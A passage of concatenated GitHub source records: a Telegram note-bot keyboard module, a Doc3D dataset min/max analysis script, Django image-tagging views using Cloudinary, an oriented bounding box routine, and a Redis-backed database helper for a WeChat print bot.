[InlineKeyboardButton(text=\"edit\", callback_data=f'edit_note: {note_id}'),\n InlineKeyboardButton(text=\"delete\", callback_data=f'delete_note: {note_id}')],\n [InlineKeyboardButton(text=\"last edit\", callback_data=f'last_edit: {note_id}')],\n [InlineKeyboardButton(text=\"add user\", callback_data=f'add_user: {note_id}')],\n [InlineKeyboardButton(text=\"🔙\", callback_data='back_from_note')]\n ])\n return ikb\n\n\ndef get_edit_note_kb(note_id):\n ikb = InlineKeyboardMarkup(inline_keyboard=[\n [InlineKeyboardButton(text=\"edit title\", callback_data=f'edit_note_title: {note_id}'),\n InlineKeyboardButton(text=\"edit text\", callback_data=f'edit_note_text: {note_id}')],\n [InlineKeyboardButton(text=\"🔙\", callback_data=f'back_from_note_edit: {note_id}')]\n ])\n return ikb\n\n\ndef get_searched_notes_kb(username: str, text: str) -> InlineKeyboardMarkup:\n notes = database_operations.search_note(username, text)\n\n builder = InlineKeyboardBuilder()\n\n for note in notes:\n builder.button(text=f\"📔{note['title']}\",\n callback_data=f\"note: {note['_id']}\")\n\n builder.button(text='🔙',\n callback_data='back_from_search')\n builder.adjust(1, True)\n markup = InlineKeyboardMarkup(inline_keyboard=builder.export())\n return markup\n\n\ndef get_back_btn_to_lastedit_kb(note_id: str) -> InlineKeyboardMarkup:\n ikb = InlineKeyboardMarkup(inline_keyboard=[\n [InlineKeyboardButton(text=\"🔙\", callback_data=f'back_from_last_edit: {note_id}')]\n ])\n return ikb","repo_name":"MalakaVoid/Note-TG-bot","sub_path":"keyboards/user_keyboards.py","file_name":"user_keyboards.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37737385230","text":"#############################################################################################################################################################################################################\n#############################################################################################################################################################################################################\n### 把 kong_model2 加入 sys.path\nimport os\ncode_exe_path = os.path.realpath(__file__) ### 目前執行 step10_b.py 的 path\ncode_exe_path_element = code_exe_path.split(\"\\\\\") ### 把 path 切分 等等 要找出 kong_model 在第幾層\nkong_layer = code_exe_path_element.index(\"kong_model2\") ### 找出 kong_model2 在第幾層\nkong_model2_dir = \"\\\\\".join(code_exe_path_element[:kong_layer + 1]) ### 定位出 kong_model2 的 dir\nimport sys ### 把 kong_model2 加入 sys.path\nsys.path.append(kong_model2_dir)\nsys.path.append(kong_model2_dir + \"/kong_util\")\n# print(__file__.split(\"\\\\\")[-1])\n# print(\" code_exe_path:\", code_exe_path)\n# print(\" code_exe_path_element:\", code_exe_path_element)\n# print(\" kong_layer:\", kong_layer)\n# print(\" kong_model2_dir:\", kong_model2_dir)\n#############################################################################################################################################################################################################\nfrom kong_util.util import get_exr\nfrom kong_util.multiprocess_util import multi_processing_interface\nfrom kong_util.wc_util import wc_3d_plot, wc_2d_plot, uv_2d_plot\nfrom kong_util.build_dataset_combine import Check_dir_exist_and_build, Check_dir_exist_and_build_new_dir, Save_as_jpg, Save_npy_path_as_knpy\nfrom multiprocessing import Manager\nimport cv2\nimport numpy as np\nfrom tqdm import tqdm\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\ndef F_ow_W_ch_min_max(data_paths, task_amount, core_amount=10, print_msg=False):\n start_time = time.time()\n with Manager() as manager: ### 設定在 multiprocess 裡面 共用的 list\n ### 以下想 multiprocess\n ### global 的 list,應該就要用 share memory 了\n ch0_maxs = manager.list() # []的概念\n ch0_mins = manager.list() # []的概念\n ch1_maxs = manager.list() # []的概念\n ch1_mins = manager.list() # []的概念\n ch2_maxs = manager.list() # []的概念\n ch2_mins = manager.list() # []的概念\n _F_ow_W_ch_min_max_multiprocess(data_paths, ch0_maxs, ch0_mins, ch1_maxs, ch1_mins, ch2_maxs, ch2_mins, core_amount=core_amount, task_amount=task_amount, print_msg=print_msg)\n\n ### finish ~~ 開始show 結果囉\n ### 先整個list秀出來 大略看看 每個切出來的小task找的狀況\n print(\"ch0_maxs:\", ch0_maxs)\n print(\"ch0_mins:\", ch0_mins)\n print(\"ch1_maxs:\", ch1_maxs)\n print(\"ch1_mins:\", ch1_mins)\n print(\"ch2_maxs:\", ch2_maxs)\n print(\"ch2_mins:\", ch2_mins)\n print()\n\n ### list 轉 numpy,操作起來較方便(可以.max(), .min())\n ch0_maxs = np.array(ch0_maxs)\n ch0_mins = np.array(ch0_mins)\n ch1_maxs = np.array(ch1_maxs)\n ch1_mins = np.array(ch1_mins)\n ch2_maxs = np.array(ch2_maxs)\n ch2_mins = np.array(ch2_mins)\n\n ### 所有task 的min/max,即整個 DB 的min/max\n print(\"ch0_maxs.max()\", ch0_maxs.max())\n print(\"ch0_mins.min()\", ch0_mins.min())\n print(\"ch1_maxs.max()\", ch1_maxs.max())\n print(\"ch1_mins.min()\", ch1_mins.min())\n print(\"ch2_maxs.max()\", ch2_maxs.max())\n print(\"ch2_mins.min()\", ch2_mins.min())\n\n print(\"total_cost_time:\", time.time() - start_time)\n \"\"\"\n doc3d\n uv\n M ch0_maxs.max() 1.0\n M ch0_mins.min() 0.0\n y ch1_maxs.max() 1.0\n y ch1_mins.min() 0.0\n x ch2_maxs.max() 1.0000006\n x ch2_mins.min() 0.0\n total_cost_time: 4322.7983639240265\n\n wc\n z ch0_maxs.max() 0.63452387\n z ch0_mins.min() -0.67187124\n x ch1_maxs.max() 1.2387834\n x ch1_mins.min() -1.2280148\n y ch2_maxs.max() 1.2485291\n y ch2_mins.min() -1.2410645\n total_cost_time: 4970.9831392765045\n total_cost_time: 4822.389922380447\n total_cost_time: 5963.885419368744 ### 2022/05/04\n\n ### DewarpNet裡寫的數值: 1.2539363, -1.2442188, 1.2396319, -1.2289206, 0.6436657, -0.67492497 # RGB -> BGR\n\n kong_doc3d(驗算一下, 順便看 kong_doc3d 有沒有寫對)\n uv\n ch0_maxs.max() 1.0\n ch0_mins.min() 0.0\n ch1_maxs.max() 1.0\n ch1_mins.min() 0.0\n ch2_maxs.max() 1.0000006\n ch2_mins.min() 0.0\n total_cost_time: 7074.6238849163055\n wc\n # ch0_maxs.max() 0.63452387\n # ch0_mins.min() -0.67187124\n # ch1_maxs.max() 1.2387834\n # ch1_mins.min() -1.2280148\n # ch2_maxs.max() 1.2485291\n # ch2_mins.min() -1.2410645\n # total_cost_time: 5963.885419368744\n\n v2\n wc 1~15\n ch0_maxs.max() 0.46694446\n ch0_mins.min() -0.50429183\n ch1_maxs.max() 1.2485291\n ch1_mins.min() -1.2410645\n ch2_maxs.max() 1.2280148\n ch2_mins.min() -1.2387834\n total_cost_time: 139.42432951927185\n\n wc 15~21\n ch0_maxs.max() 0.4421169\n ch0_mins.min() -0.47946426\n ch1_maxs.max() 1.2394472\n ch1_mins.min() -1.2396094\n ch2_maxs.max() 1.2273213\n ch2_mins.min() -1.2297894\n total_cost_time: 2367.5690183639526\n\n wc 16~21\n ch0_maxs.max() 0.4421169\n ch0_mins.min() -0.47946426\n ch1_maxs.max() 1.2385225\n ch1_mins.min() -1.2396094\n ch2_maxs.max() 1.2273213\n ch2_mins.min() -1.2297894\n total_cost_time: 254.20641613006592\n\n wc 1~21\n ch0_maxs.max() 0.46694446\n ch0_mins.min() -0.50429183\n ch1_maxs.max() 1.2485291\n ch1_mins.min() -1.2410645\n ch2_maxs.max() 1.2280148\n ch2_mins.min() -1.2387834\n 目前用看的\n\n wc 19\n ch0_maxs.max() 0.4421169\n ch0_mins.min() -0.47946426\n ch1_maxs.max() 1.2300093\n ch1_mins.min() -1.229918\n ch2_maxs.max() 1.2098893\n ch2_mins.min() -1.2277281\n total_cost_time: 14.63512635231018\n \"\"\"\n\ndef _F_ow_W_ch_min_max_multiprocess(data_paths, ch0_maxs, ch0_mins, ch1_maxs, ch1_mins, ch2_maxs, ch2_mins, core_amount, task_amount, print_msg=False):\n multi_processing_interface(core_amount=core_amount, task_amount=task_amount, task=_F_ow_W_ch_min_max, task_args=[data_paths, ch0_maxs, ch0_mins, ch1_maxs, ch1_mins, ch2_maxs, ch2_mins], print_msg=print_msg)\n\ndef _F_ow_W_ch_min_max(start_index, amount, data_paths, ch0_maxs, ch0_mins, ch1_maxs, ch1_mins, ch2_maxs, ch2_mins):\n '''\n 主要做事的地方在這裡喔!\n '''\n datas = []\n # start_index = 0\n # amount = 100\n for i, file_path in enumerate(tqdm(data_paths[start_index:start_index + amount])):\n # print(i, file_path)\n # print(i, file_path[-4:])\n if (\".exr\" in file_path[-4:].lower()): datas.append(cv2.imread(file_path, cv2.IMREAD_ANYDEPTH | cv2.IMREAD_UNCHANGED))\n elif(\".npy\" in file_path[-4:].lower()): datas.append(np.load(file_path))\n elif(\".jpg\" in file_path[-4:].lower() or\n \".png\" in file_path[-4:].lower()): datas.append(cv2.imread(file_path))\n\n datas = np.array(datas) ### list 轉 numpy\n # print(datas.shape)\n # print(\"ch0 max:\", datas[..., 0].max())\n # print(\"ch0 min:\", datas[..., 0].min())\n # print(\"ch1 max:\", datas[..., 1].max())\n # print(\"ch1 min:\", datas[..., 1].min())\n # print(\"ch2 max:\", datas[..., 2].max())\n # print(\"ch2 min:\", datas[..., 2].min())\n # print()\n ch0_maxs.append( datas[..., 0].max())\n ch0_mins.append( datas[..., 0].min())\n ch1_maxs.append( datas[..., 1].max())\n ch1_mins.append( datas[..., 1].min())\n ch2_maxs.append( datas[..., 2].max())\n ch2_mins.append( datas[..., 2].min())\n############################################################################################################################################\n############################################################################################################################################\n############################################################################################################################################\n\ndef wc_2D_3D_and_uv_visual(wc_paths, uv_paths, page_names_w_dir, dst_dir):\n start_time = time.time()\n wc_2d_dst_dir = dst_dir + \"/\" + \"wc_visual_2D\"\n wc_3d_dst_dir = dst_dir + \"/\" + \"wc_visual_3D\"\n uv_2d_dst_dir = dst_dir + \"/\" + \"uv_visual_2D\"\n Check_dir_exist_and_build(wc_2d_dst_dir)\n Check_dir_exist_and_build(wc_3d_dst_dir)\n Check_dir_exist_and_build(uv_2d_dst_dir)\n for dir_index in range(21):\n dir_name = dir_index + 1\n Check_dir_exist_and_build_new_dir(wc_2d_dst_dir + \"/%i\" % dir_name)\n Check_dir_exist_and_build_new_dir(wc_3d_dst_dir + \"/%i\" % dir_name)\n Check_dir_exist_and_build_new_dir(uv_2d_dst_dir + \"/%i\" % dir_name)\n\n\n core_amount = datas_amount // 70\n task_amount = datas_amount\n _wc_2D_3D_and_uv_visual_multiprocess(wc_paths, uv_paths, page_names_w_dir, wc_2d_dst_dir, wc_3d_dst_dir, uv_2d_dst_dir, core_amount=core_amount, task_amount=task_amount)\n\n\n for dir_index in range(21):\n dir_name = dir_index + 1\n Save_as_jpg(wc_2d_dst_dir + \"/%i\" % dir_name, wc_2d_dst_dir + \"/%i\" % dir_name, delete_ord_file=True)\n Save_as_jpg(wc_3d_dst_dir + \"/%i\" % dir_name, wc_3d_dst_dir + \"/%i\" % dir_name, delete_ord_file=True)\n Save_as_jpg(uv_2d_dst_dir + \"/%i\" % dir_name, uv_2d_dst_dir + \"/%i\" % dir_name, delete_ord_file=True)\n print(\"total_cost_time:\", time.time() - start_time)\n\ndef _wc_2D_3D_and_uv_visual_multiprocess(wc_paths, uv_paths, page_names_w_dir, wc_2d_dst_dir, wc_3d_dst_dir, uv_2d_dst_dir, core_amount, task_amount):\n multi_processing_interface(core_amount=core_amount, task_amount=task_amount, task=_wc_2D_3D_and_uv_visual, task_args=[wc_paths, uv_paths, page_names_w_dir, wc_2d_dst_dir, wc_3d_dst_dir, uv_2d_dst_dir], print_msg=True)\n\ndef _wc_2D_3D_and_uv_visual(start_index, amount, wc_paths, uv_paths, page_names_w_dir, wc_2d_dst_dir, wc_3d_dst_dir, uv_2d_dst_dir):\n for i in tqdm(range(start_index, start_index + amount)):\n # print(i, file_path)\n uv = cv2.imread(uv_paths[i], cv2.IMREAD_ANYDEPTH | cv2.IMREAD_UNCHANGED) ### 這行就可以了!\n mask = uv[..., 0]\n wc = cv2.imread(wc_paths[i], cv2.IMREAD_ANYDEPTH | cv2.IMREAD_UNCHANGED) ### 這行就可以了!\n wc_3D_good_to_v = wc[..., ::-1] ### 嘗試幾次後,這樣子比較好看\n\n wc_3d_dst_path = wc_3d_dst_dir + \"/\" + page_names_w_dir[i] + \".png\"\n fig, ax = wc_3d_plot(wc_3D_good_to_v, mask, fewer_point=True, small_size=(300, 300), ax_size=5)\n plt.savefig(wc_3d_dst_path)\n\n wc_2d_dst_path = wc_2d_dst_dir + \"/\" + page_names_w_dir[i] + \".png\"\n fig, ax = wc_2d_plot(wc, figsize=(5, 5))\n plt.savefig(wc_2d_dst_path)\n plt.close()\n\n uv_2d_dst_path = uv_2d_dst_dir + \"/\" + page_names_w_dir[i] + \".png\"\n fig, ax = uv_2d_plot(uv[..., ::-1], figsize=(5, 5))\n plt.savefig(uv_2d_dst_path)\n plt.close()\n\n############################################################################################################################################\n############################################################################################################################################\n\nif(__name__ == \"__main__\"):\n from step0_Doc3D_obj import real_doc3D\n from step0_Kong_Doc3D import kong_doc3D\n using_doc3D = kong_doc3D\n '''1_244_1-cp_Page_0995-mpT0001.exr'''\n ### 取得 wc_paths\n\n if (type(using_doc3D) == type(real_doc3D)):\n wc_paths = using_doc3D.wc_paths\n uv_paths = using_doc3D.uv_paths\n elif(type(using_doc3D) == type(kong_doc3D)):\n wc_paths = using_doc3D.wc_npy_paths\n uv_paths = using_doc3D.uv_npy_paths\n\n ### 設定 要處理的數量\n # datas_amount = 2000 #len(wc_paths) ### 少量測試時用的\n datas_amount = len(wc_paths)\n # print(\"datas_amount:\", datas_amount)\n ############################################################################################################\n\n ### 分析1:找 整個DB 所有 wc 各個channel 的 min/max\n # F_ow_W_ch_min_max(wc_paths, datas_amount, core_amount = datas_amount // 150) ### core_amount 這樣設可避免 爆記憶體 喔\n # F_ow_W_ch_min_max(uv_paths, datas_amount, core_amount = datas_amount // 150) ### core_amount 這樣設可避免 爆記憶體 喔\n # F_ow_W_ch_min_max(wc_paths, datas_amount, core_amount=datas_amount // 150) ### core_amount 這樣設可避免 爆記憶體 喔\n # F_ow_W_ch_min_max(uv_paths, datas_amount, core_amount=datas_amount // 150) ### core_amount 這樣設可避免 爆記憶體 喔\n F_ow_W_ch_min_max(kong_doc3D.W_w_M_npy_paths, datas_amount, core_amount=datas_amount // 150) ### core_amount 這樣設可避免 爆記憶體 喔\n\n ### 分析2\n # page_names_w_dir = using_doc3D.page_names_w_dir\n # wc_2D_3D_and_uv_visual(wc_paths, uv_paths, page_names_w_dir, dst_dir=r\"H:\")\n","repo_name":"KongBOy/kong_Doc3D","sub_path":"step2_analyze_wc_xyz_min_max.py","file_name":"step2_analyze_wc_xyz_min_max.py","file_ext":"py","file_size_in_byte":13665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36509870975","text":"from builtins import OSError, ValueError, len\n\nfrom django.http import HttpResponseRedirect\nfrom django.urls import reverse\nimport cloudinary\nfrom django.contrib.auth.forms import UserCreationForm\nfrom PIL import Image\nfrom imageprocessor.tagservice.tagger import detect\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom django.shortcuts import render\nfrom django.conf import settings\nfrom .forms import ImageForm\nfrom .models import Photo, Tag\n\n\nNO_TAGS_ERROR_MSG = \"We couldn't generate tags for that image. Please try a different photo\"\nBAD_FILE_ERROR_MSG = \"We can't process that file type. Please submit a different file\"\nCLOUDINARY_ERROR = \"We were able to generate tags for the image, but an error occured while attempting to save the image on our end\"\n\n\n# Create your views here.\ndef index(request):\n return render(request, 'index.html')\n\n\ndef tag_search(request):\n context = {}\n if request.method == 'POST':\n search_query = request.POST[\"tagsearch\"]\n search = 'resource_type:image AND tags=' + search_query\n\n result = cloudinary.Search() \\\n .expression(search) \\\n .with_field('tags') \\\n .max_results('10') \\\n .execute()\n\n images = []\n\n if result and 'resources' in result:\n for img in result[\"resources\"]:\n images.append(img[\"url\"])\n\n context['search_query'] = search_query\n context['images'] = images\n context['search_result'] = result\n\n return render(request, 'tagged_pictures.html', context)\n\n return render(request, 'tagsearch.html')\n\n\ndef tagged_pictures(request):\n return render(request, 'tagged_pictures.html')\n\n\ndef get_tags_for_single_image(request):\n tags = []\n try:\n open_image = Image.open(request.FILES.get('file'))\n tags = detect(open_image)\n\n # this line enables us to read from the file more than once\n request.FILES.get('file').seek(0)\n except ValueError:\n messages.add_message(request, messages.ERROR, NO_TAGS_ERROR_MSG)\n except OSError:\n messages.add_message(request, messages.ERROR, BAD_FILE_ERROR_MSG)\n return tags\n\n\ndef get_tags_for_image(request, img):\n tags = []\n try:\n open_image = Image.open(img)\n tags = detect(open_image)\n return tags\n except ValueError:\n messages.add_message(request, messages.ERROR, NO_TAGS_ERROR_MSG)\n except OSError:\n messages.add_message(request, messages.ERROR, BAD_FILE_ERROR_MSG)\n return tags\n\n\ndef upload_image_to_cloudinary(file, tags):\n file.seek(0)\n \n result = cloudinary.uploader.upload(\n file,\n use_filename=True,\n tags=tags,\n folder=settings.UPLOAD_FOLDER)\n\n #etag is unique identifier for picture\n etag = result.get('etag', None)\n try:\n # if it is the first time we uploaded image onto database, then we will rename public_ic with etag\n result = cloudinary.uploader.rename(result.get('public_id'), etag)\n except:\n # Exception will occur when same image is posted twice\n # Thus we will delete the uploaded image in the database\n cloudinary.api.delete_resources([result.get('public_id', None)])\n\n query = 'resource_type:image AND public_id='\n # We need to ensure that the database gets populated with the original photo, not the photo that was originally posted\n # This is because photo originally posted was deleted\n search_query = cloudinary.Search() \\\n .expression(query + etag) \\\n .execute()\n if (len(search_query[\"resources\"]) > 0):\n search_query['url'] = search_query[\"resources\"][0]['url']\n search_query['public_id'] = search_query[\"resources\"][0]['public_id']\n search_query['etag'] = result['etag']\n return search_query\n else:\n return result\n\ndef process_bulk_images(request):\n files = request.FILES.getlist('file')\n results = []\n for img in files:\n res = {}\n current_tag = get_tags_for_image(request, img)\n current_res = upload_image_to_cloudinary(img, current_tag)\n\n res['tags'] = current_tag\n res['url'] = current_res.get('url', None)\n res['public_id'] = current_res.get('public_id', None)\n results.append(res)\n return results\n\n\ndef process_single_image(request):\n data = {}\n generated_tags = get_tags_for_single_image(request)\n response_data = upload_image_to_cloudinary(request.FILES.get('file'), generated_tags)\n\n data['tags'] = generated_tags or None\n data['url'] = response_data.get('url', None)\n data['public_id'] = response_data.get('public_id', None)\n\n return [data]\n\n\n\ndef classify(request):\n form = ImageForm(request.POST or None, request.FILES or None)\n context = {'form' :form }\n if request.method == 'POST':\n image_count = len(request.FILES.getlist('file'))\n context['results'] = process_single_image(request) if image_count <= 1 else process_bulk_images(request)\n if request.user.is_authenticated:\n for result in context['results']:\n new_photo = Photo(url = result['url'], user = request.user, title = request.POST.get(\"title\", \"\") )\n new_photo.save()\n new_photo.create_related_tags(result['tags'])\n return render(request, 'input.html', context)\n\n\ndef register(request):\n context = {}\n form = UserCreationForm(request.POST or None)\n if request.method == 'POST':\n try:\n new_user = form.save()\n new_user.save()\n except:\n messages.add_message(request, messages.ERROR, \"user not added \")\n return HttpResponseRedirect(reverse('login'))\n context['form'] = form\n return render(request, 'register.html', context)\n\n@login_required(login_url='/registration/login/')\ndef view_my_pictures(request):\n context = {'my_pictures' : Photo.objects.filter(user = request.user)}\n return render(request, 'view_my_pictures.html', context)\n\nclass ClassifyAPI(APIView):\n\n def post(self, request, format=None):\n response_data = { 'results': None } \n results = []\n \n image_files = request.FILES.getlist('file')\n if len(image_files) < 1:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n else:\n for image_file in image_files:\n result = {\n 'status': None,\n 'error_message': None,\n 'name': image_file.name,\n 'public_id': None,\n 'url' : None,\n 'tags' : []\n }\n try:\n image = Image.open(image_file)\n tags = detect(image)\n result['tags'] = tags\n try:\n current_res = upload_image_to_cloudinary(image_file, tags)\n result['url'] = current_res.get('url', None)\n result['public_id'] = current_res.get('public_id', None)\n result['status'] = status.HTTP_200_OK\n except:\n result['status'] = status.HTTP_202_ACCEPTED\n result['error_message'] = CLOUDINARY_ERROR\n except ValueError:\n result['status'] = status.HTTP_204_NO_CONTENT\n result['error_message'] = NO_TAGS_ERROR_MSG\n except OSError:\n result['status'] = status.HTTP_415_UNSUPPORTED_MEDIA_TYPE\n result['error_message'] = BAD_FILE_ERROR_MSG\n except:\n result['status'] = status.HTTP_400_BAD_REQUEST\n \n results.append(result)\n \n response_data['results'] = results\n return Response(data=response_data, status=status.HTTP_207_MULTI_STATUS)\n \n\n\n","repo_name":"PhotoTagger/django-initial","sub_path":"imageprocessor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"37193147119","text":"from Core.BasicDefs import *\nfrom Core.Utils.LinearAlgebra import *\nfrom Core.Geometry.Intersections import IntersectLines\n\nimport math\n\n\ndef _GetExtremePointIndices( vertices ):\n maxPt = [ float('-inf'), float('-inf') ]\n minPt = [ float('inf'), float('inf') ]\n indices = [-1] * 4\n\n INDEX = INDICES()\n \n for ix, vertex in enumerate( vertices ):\n if vertex[INDEX.X] < minPt[INDEX.X]:\n minPt[INDEX.X] = vertex[INDEX.X]\n indices[INDEX.LEFT] = ix\n if vertex[INDEX.X] > maxPt[INDEX.X]:\n maxPt[INDEX.X] = vertex[INDEX.X]\n indices[INDEX.RIGHT] = ix\n if vertex[INDEX.Y] < minPt[INDEX.Y]:\n minPt[INDEX.Y] = vertex[INDEX.Y]\n indices[INDEX.BOTTOM] = ix\n if vertex[INDEX.Y] > maxPt[INDEX.Y]:\n maxPt[INDEX.Y] = vertex[INDEX.Y]\n indices[INDEX.TOP] = ix\n\n return indices\n\ndef _GetBox( caliperDirs, edgeIndices, vertices ):\n INDEX = INDICES()\n box = [None] * 4\n box[INDEX.LEFT] = IntersectLines( caliperDirs[INDEX.LEFT],\n vertices[edgeIndices[INDEX.LEFT]],\n caliperDirs[INDEX.BOTTOM],\n vertices[edgeIndices[INDEX.TOP]] )\n box[INDEX.BOTTOM] = IntersectLines( caliperDirs[INDEX.LEFT],\n vertices[edgeIndices[INDEX.LEFT]],\n caliperDirs[INDEX.BOTTOM],\n vertices[edgeIndices[INDEX.BOTTOM]] )\n box[INDEX.RIGHT] = IntersectLines( caliperDirs[INDEX.LEFT],\n vertices[edgeIndices[INDEX.RIGHT]],\n caliperDirs[INDEX.BOTTOM],\n vertices[edgeIndices[INDEX.BOTTOM]] )\n box[INDEX.TOP] = IntersectLines( caliperDirs[INDEX.LEFT],\n vertices[edgeIndices[INDEX.RIGHT]],\n caliperDirs[INDEX.BOTTOM],\n vertices[edgeIndices[INDEX.TOP]] ) \n\n area = ( Distance( box[INDEX.LEFT], box[INDEX.BOTTOM] ) *\n Distance( box[INDEX.LEFT], box[INDEX.TOP] ) )\n\n return box, area\n \ndef GetOrientedBBox( vertices, edges ):\n minBox = None\n minArea = float('inf')\n\n edgeIndices = _GetExtremePointIndices( vertices )\n caliperDirs = [ vector( [0, -1] ), vector( [1, 0] ) ]\n\n for i in range( len( vertices ) ):\n angles = [ np.dot( caliperDirs[ix % 2], edges[ edgeIndices[ ix ] ] ) ** 2 for ix in range(4) ]\n\n print(angles)\n minAngleIx = angles.index( max( angles ) )\n minCaliperIx = minAngleIx % 2\n\n caliperDirs[minCaliperIx] = edges[ edgeIndices[minAngleIx] ]\n caliperDirs[ ( minCaliperIx + 1 ) % 2 ] = GetOrthogonal( caliperDirs[minCaliperIx] )\n edgeIndices[ minAngleIx ] = ( edgeIndices[minAngleIx] + 1 ) % len(vertices)\n\n box, area = _GetBox( caliperDirs, edgeIndices, vertices )\n\n## with open( '../Output/Boxes/Box{}.txt'.format(i), 'w', encoding='utf-8' ) as f: \n## for j in box:\n## print( '{}, {}'.format( j[0], j[1] ), file = f)\n## print( edgeIndices )\n \n if area < minArea:\n minArea = area\n minBox = box\n\n return minBox\n","repo_name":"OHUSAR/OrientedBoundingBoxes","sub_path":"Source/Core/BoundingVolumes/OrientedBoundingBox.py","file_name":"OrientedBoundingBox.py","file_ext":"py","file_size_in_byte":3362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70517940074","text":"import redis\r\nimport buu_config, buu_model\r\nfrom buu_model import class_model\r\nimport datetime\r\n\r\nclass class_database_op(object):\r\n\r\n def __init__(self):\r\n self.config = buu_config.config\r\n self.redis_ins = redis.Redis(host = self.config.redis_addr, port = self.config.redir_port, \\\r\n db = self.config.redis_db, password = self.config.redis_password)\r\n\r\n def flush_redis(self):\r\n self.redis_ins.flushdb()\r\n\r\n def put_user(self, userName):\r\n exist_userId = self.redis_ins.get('user-username-id-' + userName)\r\n if not exist_userId:\r\n exist_user = class_model.User(userName = userName)\r\n userId = exist_user.id\r\n self.redis_ins.set('user-id-username-' + str(userId), userName)\r\n self.redis_ins.set('user-username-id-' + userName, userId)\r\n return int(userId)\r\n else:\r\n return exist_userId\r\n\r\n def update_user(self, userName, userId):\r\n userId = int(userId)\r\n\r\n if self.redis_ins.get('user-id-username-' + str(userId)):\r\n if str(self.redis_ins.get('user-id-username-' + str(userId)).decode('utf-8')) == userName and \\\r\n int(self.redis_ins.get('user-username-id-' + userName)) == userId:\r\n return None\r\n\r\n try:\r\n exist_user = class_model.User.select(class_model.User.q.id == userId).limit(1).getOne()\r\n exist_user.set(userName = userName)\r\n self.redis_ins.set('user-id-username-' + str(userId), userName)\r\n self.redis_ins.set('user-username-id-' + userName, userId)\r\n return None\r\n except Exception:\r\n exist_user = class_model.User(userName = userName)\r\n userId = exist_user.id\r\n self.redis_ins.set('user-id-username-' + str(userId), userName)\r\n self.redis_ins.set('user-username-id-' + userName, userId)\r\n return int(userId)\r\n\r\n def get_username_by_id(self, userId):\r\n userId = int(userId)\r\n exist_userName = self.redis_ins.get('user-id-username-' + str(userId))\r\n if exist_userName:\r\n return exist_userName.decode('utf-8')\r\n\r\n try:\r\n exist_user = class_model.User.select(class_model.User.q.id == int(userId)).limit(1).getOne()\r\n self.redis_ins.set('user-id-username-' + str(userId), exist_user.userName)\r\n self.redis_ins.set('user-username-id-' + exist_user.userName, userId)\r\n return exist_user.userName\r\n except Exception:\r\n return None\r\n\r\n def get_user_by_id(self, userId):\r\n try:\r\n exist_user = class_model.User.select(class_model.User.q.id == int(userId)).limit(1).getOne()\r\n return exist_user\r\n except Exception:\r\n return None\r\n\r\n\r\n def get_id_by_username(self, userName):\r\n exist_userId = self.redis_ins.get('user-username-id-' + userName)\r\n if exist_userId:\r\n return exist_userId\r\n\r\n try:\r\n exist_user = class_model.User.select(class_model.User.q.userName == userName).limit(1).getOne()\r\n userId = exist_user.id\r\n self.redis_ins.set('user-id-username-' + str(userId), userName)\r\n self.redis_ins.set('user-username-id-' + userName, userId)\r\n return userId\r\n except Exception:\r\n return None\r\n\r\n def get_user_current_step(self, userId):\r\n step = self.redis_ins.get('step-' + str(userId))\r\n if step:\r\n return step.decode('utf-8')\r\n\r\n return '0'\r\n\r\n def set_user_current_step(self, userId, step):\r\n self.redis_ins.set('step-' + str(userId), step)\r\n\r\n def step_back(self, userId):\r\n for single_key in self.config.fail_clean:\r\n self.delete_redis_kv(userId, single_key)\r\n cur_step = self.get_user_current_step(userId)\r\n stop_pos = cur_step.rfind('-')\r\n if stop_pos != -1:\r\n cur_step = cur_step[:stop_pos]\r\n else:\r\n cur_step = '0'\r\n self.set_user_current_step(userId, cur_step)\r\n\r\n def set_redis_kv(self, userId, key, value):\r\n self.redis_ins.set('custom-' + str(userId) + '-' + str(key), value)\r\n\r\n def get_redis_kv(self, userId, key):\r\n return self.redis_ins.get('custom-' + str(userId) + '-' + str(key))\r\n\r\n def delete_redis_kv(self, userId, key):\r\n self.redis_ins.delete('custom-' + str(userId) + '-' + str(key))\r\n\r\n\r\n\r\n def add_printer_info(self, userId, printer_name, printer_type, printer_value):\r\n try:\r\n class_model.Printer(printer_type = printer_type, printer_name = printer_name, printer_value = printer_value, user = self.get_user_by_id(userId))\r\n except Exception:\r\n pass\r\n\r\n def get_my_printers(self, userId):\r\n try:\r\n exist_printers = class_model.Printer.select(class_model.Printer.q.user == self.get_user_by_id(userId))\r\n return exist_printers\r\n except Exception:\r\n return None\r\n\r\n def delete_my_printer(self, userId, printerId):\r\n try:\r\n exist_printer = class_model.Printer.select((class_model.Printer.q.user == self.get_user_by_id(userId)) & (class_model.Printer.q.id == printerId)).limit(1).getOne()\r\n class_model.Printer.delete(exist_printer.id)\r\n return True\r\n except Exception:\r\n return False\r\n\r\n def get_all_printers(self, userId):\r\n try:\r\n exist_printers = class_model.Printer.select()\r\n return exist_printers\r\n except Exception:\r\n return None\r\n\r\n def get_printer(self, printerId):\r\n try:\r\n exist_printer = class_model.Printer.select(class_model.Printer.q.id == printerId).limit(1).getOne()\r\n return exist_printer\r\n except Exception:\r\n return None\r\n\r\n def add_print_job(self, page_num, file_name, user, printer):\r\n try:\r\n job = class_model.PrintJob(page_num = page_num, file_name = file_name, user = user, printer = printer, timestamp = datetime.datetime.now())\r\n return job.id\r\n except Exception:\r\n return None\r\n\r\n def get_print_job_total(self, printerId):\r\n try:\r\n return int(class_model.PrintJob.select(class_model.Printer.q.id == printerId).sum('page_num')) * self.config.print_price\r\n except Exception:\r\n return 0\r\n","repo_name":"glzjin/wechat_print_bot","sub_path":"buu_database.py","file_name":"buu_database.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"72"} +{"seq_id":"19652531370","text":"import os, random\n\nfrom personnage import Personnage\nfrom labyrinthe.labyrinthe import Labyrinthe\nfrom joueur import 